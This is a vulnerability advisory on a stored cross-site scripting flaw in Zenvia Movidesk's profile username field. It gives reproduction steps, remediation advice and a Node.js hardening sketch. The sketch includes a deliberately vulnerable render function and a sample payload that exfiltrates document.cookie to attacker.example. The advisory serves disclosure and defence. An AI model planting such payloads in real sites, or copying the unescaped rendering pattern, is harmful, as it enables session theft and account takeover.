Zenvia Movidesk Cross-Site Scripting Vulnerability in Profile Editing Component
Vulnerability
A cross-site scripting (XSS) vulnerability has been identified in Zenvia Movidesk versions prior to 25.01.22. The issue resides in the Profile Editing component, at the '/Account/EditProfile' endpoint, where the 'username' parameter is stored without adequate sanitization and later rendered into ticket pages without output encoding. An authenticated user can set their username to an XSS payload; the script then runs in the browser of any other user who views a ticket associated with that account, which makes this a stored XSS that can lead to Account Takeover (ATO). The vulnerability has been publicly disclosed.
Impact
Exploitation results in stored cross-site scripting: the injected script runs automatically in the browser of every user who opens an affected ticket, with no interaction required beyond viewing it. If the session cookie is readable by script (no HttpOnly flag), the payload can exfiltrate it and take over the viewer's session; when the viewer is an administrator this amounts to privilege escalation. Even with HttpOnly cookies, script executing in the victim's origin can still issue authenticated requests on the victim's behalf, so the cookie flag limits but does not eliminate the impact.
Reproduction
To reproduce, log in, open the profile editing endpoint ('/Account/EditProfile') and change the username to an XSS payload, for example an image tag whose error handler sends the document's cookies to a webhook that logs incoming requests. Save the change, then open a ticket associated with that account as a different user: the payload executes when the ticket is rendered, confirming the stored cross-site scripting.
Remediation
Users are advised to upgrade to Zenvia Movidesk version 25.01.22.245a473c54 or later. Beyond the vendor fix, the standard defences against this class of bug apply: validate the username against a strict format on input, encode output at the point of rendering (the decisive control for stored XSS), set session cookies with the HttpOnly flag so script cannot read them, deploy a restrictive Content Security Policy that disallows inline script and event-handler attributes, and conduct regular security audits of user-controlled fields that are displayed to other users.
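The following is an added illustration, not Zenvia Movidesk code: a dependency-free Node.js sketch of the controls listed above applied to the username field, with the vulnerable rendering pattern beside the hardened one so the effect of the fix can be checked. The function names, the cookie name, the regex for acceptable usernames and the sample payload are all assumptions constructed for this example.

```javascript
// Added example (not the vendor's code). Node.js, no dependencies.
// Demonstrates input validation, output encoding, HttpOnly session
// cookies and a restrictive CSP for a user-editable display name that is
// later rendered to other users (the stored-XSS path described above).

// 1. Input validation: accept only letters, digits and a few separators.
//    Assumed policy; it stops this payload class at the boundary, but the
//    output encoding below is the control that actually prevents XSS.
const USERNAME_RE = /^[\p{L}\p{N} ._'-]{1,64}$/u;

function validateUsername(name) {
  return typeof name === "string" && USERNAME_RE.test(name);
}

// 2. Output encoding: the five HTML-significant characters are encoded so
//    the value is rendered as text and never parsed as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Vulnerable pattern: the stored username is concatenated into ticket HTML.
function renderTicketVulnerable(ticket) {
  return `<div class="requester">${ticket.requesterName}</div>`;
}

// Hardened pattern: every untrusted field passes through escapeHtml.
function renderTicketHardened(ticket) {
  return `<div class="requester">${escapeHtml(ticket.requesterName)}</div>`;
}

// 3. Session cookie with HttpOnly (unreadable from document.cookie),
//    plus Secure and SameSite. Cookie name "session" is an assumption.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// 4. Restrictive CSP: no inline script and no event-handler attributes,
//    scripts only from the application's own origin.
function cspHeader() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
}

// Constructed sample input of the payload class the advisory describes: an
// image tag whose error handler exfiltrates cookies. Not a captured payload;
// the hostname is a placeholder.
const SAMPLE_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Runs the sample through both render paths and reports what each would
// send to the victim's browser.
function demo() {
  const ticket = { requesterName: SAMPLE_PAYLOAD };
  return {
    rejectedAtInput: !validateUsername(SAMPLE_PAYLOAD),
    vulnerableHtmlContainsTag: renderTicketVulnerable(ticket).includes("<img"),
    hardenedHtmlContainsTag: renderTicketHardened(ticket).includes("<img"),
    hardenedHtml: renderTicketHardened(ticket),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The check worth keeping from this is the last one: after the fix, the stored value must come back from the ticket page with `<` encoded as `&lt;`, regardless of whether input validation was also tightened, because older records written before the fix will still contain whatever was stored.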
